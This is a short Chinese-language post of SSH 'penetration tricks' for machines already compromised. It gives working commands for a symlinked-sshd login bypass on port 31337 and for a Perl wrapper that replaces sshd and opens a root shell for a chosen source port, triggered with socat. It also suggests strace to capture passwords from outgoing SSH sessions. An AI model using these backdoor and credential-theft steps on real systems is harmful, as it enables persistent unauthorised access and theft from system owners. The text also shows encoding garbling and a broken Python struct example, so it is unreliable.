滲透技巧之SSH篇
用些小技巧,蒙蒙菜鳥管理員。
1. 入侵得到SHELL后,對方防火墻沒限制,想快速開放一個(gè)可以訪問的SSH端口
肉雞上執(zhí)行
mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
就會派生一個(gè)31337端口,然后連接31337,用root/bin/ftp/mail當(dāng)用戶名,密碼隨意,就可登陸。
效果圖:
2. 做一個(gè)SSH wrapper后門,效果比第一個(gè)好,沒有開放額外的端口,只要對方開了SSH服務(wù),就能遠(yuǎn)程連接
在肉雞上執(zhí)行:
[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart
在本機(jī)執(zhí)行:
socat STDIO TCP4:10.18.180.20:22,sourceport=13377
如果你想修改源端口,可以用python的struct標(biāo)準(zhǔn)庫實(shí)現(xiàn)
>>> import struct
>>> buffer = struct.pack('>I6',19526)
>>> print repr(buffer)
'\x00\x00LF'
>>> buffer = struct.pack('>I6',13377)
>>> print buffer
4A
效果圖如下:
3. 記錄SSH客戶端連接密碼
搞定主機(jī)后,往往想記錄肉雞SSH連接到其他主機(jī)的密碼,進(jìn)一步擴(kuò)大戰(zhàn)果,使用strace命令就行了。
效果圖: